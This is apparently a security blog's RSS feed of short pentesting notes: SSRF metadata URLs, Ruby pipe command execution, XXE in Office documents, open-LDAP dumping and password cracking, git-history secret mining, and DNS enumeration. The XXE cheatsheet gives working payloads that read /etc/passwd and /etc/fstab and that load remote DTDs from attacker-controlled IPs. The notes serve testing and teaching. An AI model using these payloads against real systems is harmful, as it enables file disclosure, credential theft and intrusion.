https://silentrobots.com/tags/notes/Recent content in Notes on Willis VandevanterHugo -- gohugo.ioen-usMon, 28 Mar 2016 00:00:00 +0000https://silentrobots.com/cloud-metadata-url-list/Mon, 28 Mar 2016 00:00:00 +0000https://silentrobots.com/cloud-metadata-url-list/<img src="https://silentrobots.com/" alt="Featured image of post Cloud Metadata URL List" /><p>I landed the SSRF Cloud Metadata technique in a few different scenarios recently. If you haven’t seen the talk <a class="link" href="https://youtu.be/JTOWxi17k-w?t=1411" target="_blank" rel="noopener" >BHUSA 2014 - Bringing a Machete to the Amazon</a> I recommend it.</p> <p>To make life a little easier created a living URL list for Metadata broken down by cloud. There are a few more than he discusses in the talk but still has work to go. Submit a PR if you see some missing.</p> <p><a class="link" href="https://gist.github.com/BuffaloWill/fa96693af67e3a3dd3fb" target="_blank" rel="noopener" >https://gist.github.com/BuffaloWill/fa96693af67e3a3dd3fb</a></p>https://silentrobots.com/simple-ruby-exec-with-open-and-pipe/Tue, 14 Apr 2015 00:00:00 +0000https://silentrobots.com/simple-ruby-exec-with-open-and-pipe/<img src="https://silentrobots.com/" alt="Featured image of post Simple Ruby Exec with Open and Pipe" /><p>I was researching something else and thought this was a cool way to execute a command through the open method in ruby:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">open(&#34;|[CMD]&#34;) </span></span></code></pre></td></tr></table> </div> </div><p>The key is starting the open with pipe. For example,</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">open(&#34;|ls&#34;) </span></span></code></pre></td></tr></table> </div> </div><p>Or to exec and print the result in one line:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">open(&#34;|ls&#34;).each {|out| puts out } </span></span></code></pre></td></tr></table> </div> </div><p>Not sure where I saw it originally, but this is an interesting older read: <a class="link" href="https://devver.wordpress.com/2009/06/30/a-dozen-or-so-ways-to-start-sub-processes-in-ruby-part-1/" target="_blank" rel="noopener" >https://devver.wordpress.com/2009/06/30/a-dozen-or-so-ways-to-start-sub-processes-in-ruby-part-1/</a></p>https://silentrobots.com/exploiting-xxe-vulnerabilities-in-oxml-documents-part-1/Wed, 04 Mar 2015 00:00:00 +0000https://silentrobots.com/exploiting-xxe-vulnerabilities-in-oxml-documents-part-1/<img src="https://silentrobots.com/" alt="Featured image of post Exploiting XXE Vulnerabilities in OXML Documents - Part 1" /><p>OXML is a common document format; think docx (Microsoft Word Document), pptx (Microsoft Powerpoint), xlsx (Excel Spreadsheet), etc.</p> <p>An OXML document is a zip file containing XML files and any media files. When the document is rendered, the rendering library unzips the document and then parses the containing XML files. The order the XML files are parsed and which files maintain precedence over the others is dependent on the type of document. The following link is from Microsoft on the XML structure in Office 2007 files: <a class="link" href="https://msdn.microsoft.com/en-us/library/aa338205%28v=office.12%29.aspx#office2007aboutnewfileformat_structureoftheofficexmlformats" target="_blank" rel="noopener" >File format structure</a></p> <p>I have had success in the past embedding XML External Entities into the XML files of a docx, the XXE is exploited when the document is parsed. An easy example of this would be in file upload functionality that allows docx, pptx, or xlsx. Facebook was found vulnerable to this exact scenario in December 2014; <a class="link" href="https://threatpost.com/xxe-bug-patched-in-facebook-careers-third-party-service" target="_blank" rel="noopener" >XXE Bug Patched in Facebook</a>.</p> <p>If you review the Microsoft link posted earlier you will see that each XML file plays a different role. I have found varying levels of success in which XML file I embed the XXE exploit into. To help out with this testing process I wrote a tool:</p> <p><a class="link" href="https://github.com/BuffaloWill/oxml_xxe" target="_blank" rel="noopener" >https://github.com/BuffaloWill/oxml_xxe</a></p> <p>Keeping with 300 words or less I will stop here and pick up with oxml_xxe usage in the next blog post.</p>https://silentrobots.com/ldapsearch-notes/Wed, 25 Feb 2015 00:00:00 +0000https://silentrobots.com/ldapsearch-notes/<img src="https://silentrobots.com/" alt="Featured image of post ldapsearch notes" /><p>I seem to find open LDAP servers on the Internet more often than I should. Here are some notes on using ldapsearch</p> <h1 id="installing-ldapsearch-on-ubuntu">Installing ldapsearch on Ubuntu </h1><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">apt-get install ldap-utils </span></span></code></pre></td></tr></table> </div> </div><h1 id="root-dse-object">Root-DSE object </h1><p>nmap includes a script to gather info from a LDAP root-dse object (<a class="link" href="https://nmap.org/nsedoc/scripts/ldap-rootdse.html" target="_blank" rel="noopener" >http://nmap.org/nsedoc/scripts/ldap-rootdse.html</a>). We can also use ldapsearch to test:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">ldapsearch -p [PORT] -x -b &#34;&#34; -s base &#39;objectclass=*&#39; -h [IP] </span></span></code></pre></td></tr></table> </div> </div><h1 id="open-ldap-server">Open LDAP server </h1><p>Connect to an open LDAP server, john the ripper can be used to crack passwords that are returned:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">ldapsearch -p [PORT] -x -h [IP] -b &#34;dc=[y],dc=com&#34; </span></span></code></pre></td></tr></table> </div> </div>https://silentrobots.com/search-all-github-repositories-for-an-organization/Fri, 09 Jan 2015 00:00:00 +0000https://silentrobots.com/search-all-github-repositories-for-an-organization/<img src="https://silentrobots.com/" alt="Featured image of post Search all Github Repositories for an Organization" /><p><a class="link" href="https://github.com/BuffaloWill/gumbler" target="_blank" rel="noopener" >gumbler</a> is a script I wrote to search through git commits and introduced in the blog post <a class="link" href="https://silentrobots.com/blog/2014/10/06/gumbler/" >“Searching Through Git Commits”</a>. Recently I wanted to run Gumbler across all repositories for an organization, the steps are discussed below.</p> <p>First, we need to grab a list of repositories for the ORG. This can be done using the API</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">curl &#34;https://api.github.com/orgs/[ORG NAME]/repos?page=1&amp;per_page=10000&#34; &gt; repos.json </span></span><span class="line"><span class="cl">curl &#34;https://api.github.com/orgs/[ORG NAME]/repos?page=2&amp;per_page=10000&#34; &gt;&gt; repos.json </span></span><span class="line"><span class="cl">... </span></span></code></pre></td></tr></table> </div> </div><p>Note, the API limits the number of values returned so you will want to update the page count to make sure you get them all.</p> <p>Next we iterate through each repository, clone it, and run gumbler across the repo. A simple Ruby script is given below. Note, ignore any repos that were forked as they aren’t specific to the orgnization.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-ruby" data-lang="ruby"><span class="line"><span class="cl"><span class="nb">require</span> <span class="s1">&#39;json&#39;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># specify repos.json as an argument</span> </span></span><span class="line"><span class="cl"><span class="n">file</span> <span class="o">=</span> <span class="no">File</span><span class="o">.</span><span class="n">read</span><span class="p">(</span><span class="no">ARGV</span><span class="o">[</span><span class="mi">0</span><span class="o">]</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># parse the json</span> </span></span><span class="line"><span class="cl"><span class="n">data_hash</span> <span class="o">=</span> <span class="no">JSON</span><span class="o">.</span><span class="n">parse</span><span class="p">(</span><span class="n">file</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># iterate each hash</span> </span></span><span class="line"><span class="cl"><span class="n">data_hash</span><span class="o">.</span><span class="n">each</span> <span class="k">do</span> <span class="o">|</span><span class="nb">hash</span><span class="o">|</span> </span></span><span class="line"><span class="cl"> <span class="c1"># ignore forked repos</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="o">!</span><span class="p">(</span><span class="nb">hash</span><span class="o">[</span><span class="s2">&#34;fork&#34;</span><span class="o">]</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="nb">puts</span> <span class="s2">&#34;|+| Testing </span><span class="si">#{</span><span class="nb">hash</span><span class="o">[</span><span class="s2">&#34;name&#34;</span><span class="o">]</span><span class="si">}</span><span class="s2">&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="c1"># clone the project</span> </span></span><span class="line"><span class="cl"> <span class="sb">`git clone https://github.com/[ORG]/</span><span class="si">#{</span><span class="nb">hash</span><span class="o">[</span><span class="s2">&#34;name&#34;</span><span class="o">]</span><span class="si">}</span><span class="sb">.git`</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="c1"># Gumbler requires full directory paths</span> </span></span><span class="line"><span class="cl"> <span class="sb">`ruby ~/gumbler/gumbler.rb -s -p </span><span class="si">#{</span><span class="nb">hash</span><span class="o">[</span><span class="s2">&#34;name&#34;</span><span class="o">]</span><span class="si">}</span><span class="sb"> ~/[ORG]/results/`</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="nb">sleep</span><span class="p">(</span><span class="mi">3</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">end</span> </span></span><span class="line"><span class="cl"><span class="k">end</span> </span></span></code></pre></td></tr></table> </div> </div>https://silentrobots.com/searching-through-git-commits/Mon, 06 Oct 2014 00:00:00 +0000https://silentrobots.com/searching-through-git-commits/<img src="https://silentrobots.com/" alt="Featured image of post Searching Through Git Commits" /><p><a class="link" href="https://github.com/BuffaloWill/gumbler" target="_blank" rel="noopener" >gumbler</a> is a script I wrote to search through git commits. Examples from github are discussed below.</p> <h1 id="gitignore">.gitignore </h1><p>A gitignore file is used to specify files that should not be tracked by git (source <a class="link" href="https://git-scm.com/docs/gitignore" target="_blank" rel="noopener" >gitignore</a>). In the default case, gumbler will read the gitignore file for the project and search every revision for a case where a file from gitignore was committed. Possible use cases would be as a pen tester looking for reconnaisance data (e.g. developer usernames/passwords, staging hosts/services, etc.) or a developer to verify projects did not previously commit “secret” data.</p> <p>I am a big fan of what Netflix is doing with regards to open source and security. After looking through a number of their projects, I noticied Priam has a few commits with non-damaging files from the gitignore.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">$. git clone https://github.com/Netflix/Priam.git </span></span><span class="line"><span class="cl">Cloning into &#39;Priam&#39;... </span></span><span class="line"><span class="cl">.... </span></span><span class="line"><span class="cl">Checking connectivity... done. </span></span><span class="line"><span class="cl">$. ruby gumbler/gumbler.rb Priam/ gumbler_testing/tmp/ </span></span><span class="line"><span class="cl">|-| Jumping to remote @directory Priam/ </span></span><span class="line"><span class="cl">|-| Storing every revision </span></span><span class="line"><span class="cl">checking for *.com.. </span></span><span class="line"><span class="cl">checking for *.class.. </span></span><span class="line"><span class="cl">..... </span></span><span class="line"><span class="cl">|+| Looking for .classpath, Found it in BRANCH : 697fd66aae9beed107e13f49a741455f1d9d8dd9 .classpath. Storing it in gumbler_testing/tmp/. </span></span><span class="line"><span class="cl">|+| Looking for .classpath, Found it in BRANCH : 47bdb537789c034493e94d8977eae77ecbfd5b24 .classpath. Storing it in gumbler_testing/tmp/. </span></span><span class="line"><span class="cl">|+| Looking for .classpath, Found it in BRANCH : 442862d4a8d4d18d0e176ded8795dd45a24528fc .classpath. Storing it in gumbler_testing/tmp/. </span></span><span class="line"><span class="cl">.... </span></span><span class="line"><span class="cl">checking for .project.. </span></span><span class="line"><span class="cl">|+| Looking for .project, Found it in BRANCH : 697fd66aae9beed107e13f49a741455f1d9d8dd9 .project. Storing it in gumbler_testing/tmp/. </span></span><span class="line"><span class="cl">|+| Looking for .project, Found it in BRANCH : 0941d9e0e0dda3ee1d9d4dda757d59ffb641abcf .project. Storing it in gumbler_testing/tmp/. </span></span><span class="line"><span class="cl">|+| Looking for .project, Found it in BRANCH : 47bdb537789c034493e94d8977eae77ecbfd5b24 .project. Storing it in gumbler_testing/tmp/. </span></span><span class="line"><span class="cl">.... </span></span><span class="line"><span class="cl">checking for .settings.. </span></span><span class="line"><span class="cl">.... </span></span></code></pre></td></tr></table> </div> </div><p>.classpath or .project are not damaging in this case and, hence, are used as the example. On a pen test or in collaborative projects I have found much worse (cough usernames, passwords). This shouldn’t be that surprising.</p> <h1 id="searching-commit-logs">Searching Commit Logs </h1><p>Another use case for gumbler is to look through commit history. Using Ruby on Rails as an example, we can search from for any commit with “CVE” in it. Gumbler will output a diff from the files changed in the commit.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">$. ruby gumbler/gumbler.rb --grep CVE rails/ tmp/ </span></span><span class="line"><span class="cl">|!| skipping .gitignore, searching commit log for CVE </span></span><span class="line"><span class="cl">$. ls tmp/ </span></span><span class="line"><span class="cl">060c91cd59ab86583a8f2f52142960d3433f62f5-2012-05-30_15:13:03_-0700.diff 88cc1688d0cb828c17706b41a8bd27870f2a2beb-2013-01-08_12:11:18_-0800.diff </span></span><span class="line"><span class="cl">08d0a11a3f62718d601d39e617c834759cf59bbb-2014-02-18_15:38:50_-0300.diff 8be6913990c30f63618173da722148892348dcc9-2013-03-15_17:45:53_-0700.diff </span></span><span class="line"><span class="cl">0b58a7ff420d7ef4b643c521a62be7259dd2f5cb-2011-02-08_14:21:12_-0800.diff 8e577fe560d5756fcc67840ba304d79ada6804e4-2013-01-08_12:41:24_-0800.diff </span></span><span class="line"><span class="cl">0c7ac34aed1845044cd1911e5a775366d7ca41c1-2013-12-02_16:42:16_-0800.diff 9340f89849606dba02f44038171f3837f883fd4e-2012-05-30_15:09:13_-0700.diff </span></span><span class="line"><span class="cl">2392535f4085d88186097e3c23414e958fb1d16d-2013-03-18_10:17:32_-0700.diff 93fb4c1e62dc9605eecbfaffda2becc85890fa5f-2014-07-10_10:20:16_-0700.diff </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">$. cat 060c91cd59ab86583a8f2f52142960d3433f62f5-2012-05-30_15\:13\:03_-0700.diff </span></span><span class="line"><span class="cl">060c91cd59ab86583a8f2f52142960d3433f62f5-2012-05-30 15:13:03 -0700==&gt; 2012-05-30 15:13:03 -0700 Strip [nil] from parameters hash. Thanks to Ben Murphy for reporting this! Strip [nil] from parameters hash. </span></span><span class="line"><span class="cl">Thanks to Ben Murphy for reporting this! </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">CVE-2012-2660 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">:100644 100644 aa5ba3e... 6757a53... M actionpack/lib/action_dispatch/http/request.rb </span></span><span class="line"><span class="cl">:100644 100644 c3f009a... 6ea66f9... M actionpack/test/dispatch/request/query_string_parsing_test.rb </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">diff --git a/actionpack/lib/action_dispatch/http/request.rb b/actionpack/lib/action_dispatch/http/request.rb </span></span><span class="line"><span class="cl">index aa5ba3e..6757a53 100644 </span></span><span class="line"><span class="cl">--- a/actionpack/lib/action_dispatch/http/request.rb </span></span><span class="line"><span class="cl">+++ b/actionpack/lib/action_dispatch/http/request.rb </span></span><span class="line"><span class="cl">.... </span></span></code></pre></td></tr></table> </div> </div><p>As the README says, be careful using the tool as it uses Command Execution to search. A malicious git project could take advantage of this. Ping me with better ways to handle this.</p>https://silentrobots.com/xml-entity-cheatsheet/Wed, 03 Sep 2014 00:00:00 +0000https://silentrobots.com/xml-entity-cheatsheet/<img src="https://silentrobots.com/" alt="Featured image of post XML Entity Cheatsheet" /><p>An XML Entity testing cheatsheet. Testing was done using an older vulnerable version of nokogiri. In IRB you can require previous versions of gems. Certain techniques (e.g. XInclude) may require additional settings in Nokogiri.</p> <p>XML Headers:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">&lt;?xml version=&#34;1.0&#34; standalone=&#34;no&#34;?&gt; </span></span><span class="line"><span class="cl">&lt;?xml version=&#34;1.0&#34; standalone=&#34;yes&#34;?&gt; </span></span></code></pre></td></tr></table> </div> </div><p>Vanilla entity test:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">&lt;!DOCTYPE root [&lt;!ENTITY post &#34;1&#34;&gt;]&gt;&lt;root&gt;&amp;post;&lt;/root&gt; </span></span></code></pre></td></tr></table> </div> </div><p>SYSTEM entity test (xxe):</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">&lt;!DOCTYPE root [&lt;!ENTITY post SYSTEM &#34;file:///etc/passwd&#34;&gt;]&gt; </span></span><span class="line"><span class="cl">e.g. </span></span><span class="line"><span class="cl">doc = Nokogiri::XML(&#34;&lt;!DOCTYPE root [ &lt;!ENTITY spl SYSTEM \&#34;file:///etc/passwd\&#34;&gt; ]&gt;\n&lt;a&gt;&amp;spl;&lt;/a&gt;&#34;) </span></span><span class="line"><span class="cl">doc.children.children.children.text </span></span></code></pre></td></tr></table> </div> </div><p>Parameter Entity Test. One of the benefits is a paremeter entity is automatically expanded inside the DOCTYPE:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">&lt;!DOCTYPE root [&lt;!ENTITY % dtd SYSTEM &#34;http://[IP]/some.dtd&#34;&gt;&lt;!ENTITY % a &#34;test %dtd&#34;&gt;]&gt; </span></span><span class="line"><span class="cl">e.g. </span></span><span class="line"><span class="cl">options = Nokogiri::XML::ParseOptions::DTDATTR </span></span><span class="line"><span class="cl">doc = Nokogiri::XML::Document.parse(&#34;&lt;!DOCTYPE test [&lt;!ENTITY % dtd SYSTEM \&#34;http://172.16.122.177/student.dtd\&#34;&gt;&lt;!ENTITY % a &#34;test %dtd&#34;&gt;]&gt;\n&lt;test&gt;success&lt;/test&gt;&#34;, nil, nil, options) </span></span><span class="line"><span class="cl">doc.children.text </span></span></code></pre></td></tr></table> </div> </div><p>Combined Entity and Parameter Entity:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">&lt;!DOCTYPE root [&lt;!ENTITY post SYSTEM &#34;http://&#34;&gt;&lt;!ENTITY % dtd SYSTEM &#34;http://[IP]/some.dtd&#34;&gt;&lt;!ENTITY % a &#34;test %dtd&#34;&gt;]&gt;&lt;root&gt;&amp;post;&lt;/root&gt; </span></span></code></pre></td></tr></table> </div> </div><p>XInclude:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">&lt;document xmlns:xi=&#34;http://&lt;IP&gt;/XInclude&#34;&gt;&lt;footer&gt;&lt;xi:include href=&#34;title.xml&#34;/&gt;&lt;/footer&gt;&lt;/document&gt; </span></span><span class="line"><span class="cl">&lt;root xmlns:xi=&#34;http://www.w3.org/2001/XInclude&#34;&gt; </span></span><span class="line"><span class="cl">&lt;xi:include href=&#34;file:///etc/fstab&#34; parse=&#34;text&#34;/&gt; </span></span></code></pre></td></tr></table> </div> </div><p>URL handler. This follows <a class="link" href="https://publib.boulder.ibm.com/infocenter/wsadhelp/v5r1m2/topic/com.ibm.etools.xmlbuilder.doc/topics/cxmlcat.html]" target="_blank" rel="noopener" >XML Entity - IBM</a> I have not seen this work “in the wild”. Should be useful for exfiltration testing:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">&lt;!DOCTYPE root [&lt;!ENTITY c PUBLIC &#34;-//W3C//TEXT copyright//EN&#34; &#34;http://[IP]/copyright.xml&#34;&gt;]&gt; </span></span></code></pre></td></tr></table> </div> </div><p>XML Schema Inline:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">&lt;madeuptag xlmns=&#34;http://[ip]&#34; xsi:schemaLocation=&#34;http://[IP]&#34;&gt; </span></span><span class="line"><span class="cl">&lt;/madeuptag&gt; </span></span></code></pre></td></tr></table> </div> </div><p>Remote XML Schema. Also, have not been able to get this to work:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">&lt;!DOCTYPE root PUBLIC &#34;abc/Catalog&#34; &#34;http://[IP]/catalog.dtd&#34;&gt; </span></span></code></pre></td></tr></table> </div> </div><p>Useful Links:</p> <ul> <li><a class="link" href="https://publib.boulder.ibm.com/infocenter/wsadhelp/v5r1m2/topic/com.ibm.etools.xmlbuilder.doc/topics/cxmlcat.html" target="_blank" rel="noopener" >XML Entity Examples - IBM</a></li> <li><a class="link" href="http://www.vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf" target="_blank" rel="noopener" >XML Schema, DTD, and Entity Attacks - A Compendium of Known Techniques</a></li> <li><a class="link" href="https://www.owasp.org/index.php/Testing_for_XML_Injection_%28OTG-INPVAL-008%29" target="_blank" rel="noopener" >OWASP Testing for XML Entity Injection</a></li> </ul>https://silentrobots.com/ipv6-dns-guessing-notes/Tue, 19 Aug 2014 00:00:00 +0000https://silentrobots.com/ipv6-dns-guessing-notes/<img src="https://silentrobots.com/" alt="Featured image of post IPv6 DNS Guessing Notes" /><p>A hostname with an IPv6 address is stored as a AAAA resource record in DNS (see <a class="link" href="https://en.wikipedia.org/wiki/AAAA_record" target="_blank" rel="noopener" >AAAA record</a>). There are many DNS hostname bruteforcing tools, personally I like <a class="link" href="http://ha.ckers.org/fierce/" target="_blank" rel="noopener" >Fierce</a>. Suppose we have already run our hostname bruteforcing tool against a target domain (e.g. facebook.com). Below we use dig to do a AAAA record lookup for each hostname. Note, the DNS server we use matters. In this example we use 8.8.8.8, to confirm different results try using a.ns.facebook.com instead. Host can also be used instead of dig:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">$&gt; cat fb_hosts.txt | while read line; do echo $line&#34; Results:&#34; &amp;&amp; dig @8.8.8.8 +noall +answer AAAA $line &amp;&amp; echo; done </span></span><span class="line"><span class="cl">mobile.facebook.com Results: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">ipv6.facebook.com Results: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">www.facebook.com Results: </span></span><span class="line"><span class="cl">www.facebook.com. 1903 IN CNAME star.c10r.facebook.com. </span></span><span class="line"><span class="cl">star.c10r.facebook.com. 30 IN AAAA 2a03:2880:f00b:900:face:b00c:0:1 </span></span></code></pre></td></tr></table> </div> </div><p>An offline/quieter way is to use the <a class="link" href="https://scans.io/study/sonar.fdns" target="_blank" rel="noopener" >DNS Record (ANY)</a> set from the Internet-Wide Scan Data Repository done by Rapid7. Using facebook.com as an example again:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">$&gt; pigz -dc 20140310_dnsrecords.gz | grep -i &#34;\.facebook\.com&#34; | grep AAAA </span></span></code></pre></td></tr></table> </div> </div><p>This didn’t turn up very many results but we can combine the two:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">$&gt; pigz -dc 20140310_dnsrecords.gz | zgrep &#34;\.facebook\.com&#34; | grep &#34;,A,&#34; | cut -d&#34;,&#34; -f1 | while read line; do echo $line&#34; Results:&#34; &amp;&amp; dig @8.8.8.8 +noall +answer AAAA $line &amp;&amp; echo; done </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">z.c10r.facebook.com Results: </span></span><span class="line"><span class="cl">z.c10r.facebook.com. 59 IN AAAA 2a03:2880:f00b:305:face:b00c:0:1 </span></span><span class="line"><span class="cl">... </span></span></code></pre></td></tr></table> </div> </div><p>You get the idea =). Not a new concept or technique, just wanted to put some notes in one place.</p>